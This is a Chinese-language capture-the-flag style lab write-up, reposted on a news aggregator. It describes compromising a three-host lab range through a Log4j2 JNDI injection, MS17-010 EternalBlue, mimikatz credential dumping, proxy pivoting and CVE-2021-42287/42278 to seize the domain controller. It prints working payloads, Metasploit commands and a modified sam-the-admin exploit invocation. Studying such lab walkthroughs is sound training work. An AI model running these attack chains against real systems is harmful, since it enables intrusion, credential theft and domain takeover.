Redian新闻
>
从log4j2到DC

从log4j2到DC

科技

前段时间发现了个靶场,感觉里面的漏洞还是比较新的,包含了log4j2、CVE-2021-42287、CVE-2021-42278。

靶场环境

本次靶场需获取3个flag即可通关,每台机器均有一个flag文件。该靶场拓扑图如下:



如果在搭建靶机中发现双网卡机器不出网的情况下,可以设置网卡优先级

sudo ip route del default via 10.0.1.7 dev ens38sudo ip route add default via 10.0.1.7 dev ens38 metric 101

信息收集

实战时当我们拿到目标地址时,通常的做法就是扫描端口,以及相关地址的C段扫描。在条件允许时尽可能进行全端口扫描(因为靶场环境所以不涉及C段扫描)。

nmap -sV -Pn -n -sT --open -p- 172.16.111.54


通过对目标地址全端口扫描,发现了22端口和38080端口开放,为此我们的思路大致为
1、爆破22ssh服务
2、访问38080端口
访问38080端口发现web服务,接下来就是找web相关站点漏洞,以及进行目录扫描。



对该web资产目录扫描发现了如上目录。

发现Log4j2漏洞

访问目录error和hello时,burp插件被动扫描出存在log4j漏洞。




可以看到该web站点Accept内存在漏洞点。然后可以利用该log4j2漏洞获得目标机权限。
本机开启JNDIExploit,运行命令如下

java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 172.16.100.234
利用TomcatEcho回显验证漏洞,发现未root权限

${jndi:ldap://172.16.111.212:1389/TomcatBypass/TomcatEcho}


当然也可以利用TomcatMemshell3直接注入内存马。
在request请求头加入查找flag命令获取第一关flag文件。

cmd:find / -name "*flag*"


执行cat命令即可获取flag内容

flag{redteam.lab-1}Congratulations, you got this: saul Saul123


该flag文件中还暴露出一个疑似账号密码的字符串saul Saul123,为此我们可以联想到该机器开放的22ssh服务,尝试密码碰撞。当然如果碰撞失败也可以在当前机器写入shell拿到服务器权限。

内网信息收集


测试发现使用账号saul密码Saul123可登录linux服务器,并且在该机器发现双网卡,上传fscan并搭建socks5代理。



发现该网段10.0.1.7服务器存在ms17010漏洞,并且也提示为双网卡机器

获取域用户权限

使用msf进行攻击获取该主机权限
search ms17_010use windows/smb/ms17_010_eternalblueuse windows/x64/meterpreter/bind_tcpset RHOST 0.0.0.0set payload windows/x64/meterpreter/bind_tcpuse windows/smb/ms17_010_eternalblueset RHOSTS 10.0.1.7run


拿到系统权限后,通过mimikatz查看账号密码
load mimikatzcreds_all


发现该服务存在域,并且mimikatz获取了域用户账号root Red12345
进入该服务器shell中,搜索获取flag文件

cmd /c dir /s/a-d/b C:\flag.txt
成功获取到第二关flag{redteam.lab-2}



通过查询该服务器ipconfig发现存在10.0.0.7网段


利用CVE-2021-42287、CVE-2021-42278获取域控权限


通过定位时间服务器判断DC,发现10.0.0.12疑似为域控服务器



利用前段时间爆出的CVE-2021-42287、CVE-2021-42278拿来试一试
exp脚本
https://github.com/WazeHell/sam-the-admin
该漏洞的前置条件:需要一个域用户
因域控在第三层网络并且不出网,所以需要利用2层代理网络进行攻击
利用MSF添加了一个Socks5


use server/socks_proxyset SRVPORT 8889runjobssessions 2run autoroute -s 10.0.0.7/24 #旧版run post/multi/manage/autoroute
然后mac配置proxychains4运行该攻击脚本



mac上运行后发现找不到impacket目录文件,作者在说明里说只支持kali系统,测试发现旧版kali也没有smbexec可执行文件



查看源码发现脚本调用两个可执行文件
fbinary = "/usr/bin/impacket-smbexec" if options.dump: fbinary = "/usr/bin/impacket-secretsdump" getashell = f"KRB5CCNAME='{adminticket}' {fbinary} -target-ip {options.dc_ip} -dc-ip {options.dc_ip} -k -no-pass @'{dcfull}' " os.system(getashell)
查看mac安装的impacket路径,并修改代码将可执行文件改成py文件
fbinary = "python3 /usr/local/bin/smbexec.py" if options.dump: fbinary = "python3 /usr/local/bin/secretsdump.py" getashell = f"KRB5CCNAME='{adminticket}' {fbinary} -target-ip {options.dc_ip} -dc-ip {options.dc_ip} -k -no-pass @'{dcfull}' " os.system(getashell)
漏洞利用成功:
proxychains4 python3 sam_the_admin.py "redteam/root:Red12345" -dc-ip 10.0.0.12 -shell


接下来搜索该DC的flag文件
cmd /c dir /s/a-d/b C:\flag.txt


成功获取到了第三道flag{redteam.lab-3}

总结

通过练习靶场可以很好的形成攻击思路,优化攻击手法以及检验工具环境的配备,以便在之后实战攻防演练中先拔头筹。

原文链接

https://mp.weixin.qq.com/s/zWyZlifnJdNCSfuYchXKlw

E

N

D



Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、系统安全、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

团队作为“省级等保关键技术实验室”先后与哈工大、齐鲁银行、聊城大学、交通学院等多个高校名企建立联合技术实验室。团队公众号自创建以来,共发布原创文章400余篇,自研平台达到31个,目有18个平台已开源。此外积极参加各类线上、线下CTF比赛并取得了优异的成绩。如有对安全行业感兴趣的小伙伴可以踊跃加入或关注我们

微信扫码关注该文公众号作者

戳这里提交新闻线索和高质量文章给我们。
相关阅读
第一个真实世界研究验证丨辉瑞新冠药物Paxlovid,治疗Omicron BA.2到底有没有效?自动驾驶大迁徙:从L4到L2的降维之战 | 甲子光年心巧嘴乖到底普京有多大魄力玩命,拜登有多少血性杀人[照片] 6月上海兜兜转Plog伦敦百万人创历史骄傲游行:50周年不忘自由初心,Love is love哥廷根大学换新LOGO啦!千万级可观测数据采集器--iLogtail代码完整开源vlog:在250年老树上睡觉泡澡!提前大半年才定到的树屋,娃却惦记着大灰狼!約旦埃及2021(8)首都Amman京东Logo换新了,但这也太太太太太廉价了吧!去这些地方可以打卡遇到Drama Queen!《日落豪宅》第五季LA拍摄地点全攻略“隔离酒店是我能到的最远距离!”,我从LA机场-隔离酒店-医院-LA机场,用时3个月突发!从LA出发的火车与卡车相撞,8节车厢脱轨,造成3死50伤!Shanghai Lockdown Disrupts Wedding Plans on Day for LoversChinese Ad Company Fined Over Sexist SloganHenan Plans to ‘Recognize’ Locals Preventing Domestic ViolenceElon Musk 正式宣布 SpaceX 产品开放 Dogecoin 购买《题π Day 早》As Long-Distance Travel Plummets, China Vacations Close to Home【VLOG】干净又卫生,小米净饮机开箱EDC倒计时一个月!是时候该规划路线了~附送本周洛杉矶蹦迪指南恭喜【IC】学员拿下英国Cognizant Technology Solutions Offer!Revived Poyang Lake Dam Project Sparks Ecological Concernsvlog:跑去唐顿2全球首映式!一部戏上百套戏服背后,竟有那么多讲究Shanghai’s ‘Psychological Emergency’ Warrants Attention封控中的上海五月,2个摄影师拍同一条街道|hayami's vlog她在方舱跳 swing,他在方舱干一杯|hayami's blog逆转中国疫情爆发趋势应该做这两件事芝加哥最强音乐节LOLLAPALOOZA 来了! 抢票开始!Cabanas 已经 Sold out!Families Unite to List a Rare Disease in Official Catalog合作辉瑞疫苗,针刺保护自动开启——Sharps Technology一次性解决注射器缺陷,完成IPO他对我好,应该成为一种择偶标准吗?|hayami's blogPaxlovid治疗COVID-19的复阳率到底是多少?美国CDC发布首次真实世界疗效报告对话云途半导体耿晓祥:从Tier 2到Tier 0.5,国产MCU厂商如何上位? | 甲子光年
logo
联系我们隐私协议©2024 redian.news
Redian新闻
Redian.news刊载任何文章,不代表同意其说法或描述,仅为提供更多信息,也不构成任何建议。文章信息的合法性及真实性由其作者负责,与Redian.news及其运营公司无关。欢迎投稿,如发现稿件侵权,或作者不愿在本网发表文章,请版权拥有者通知本网处理。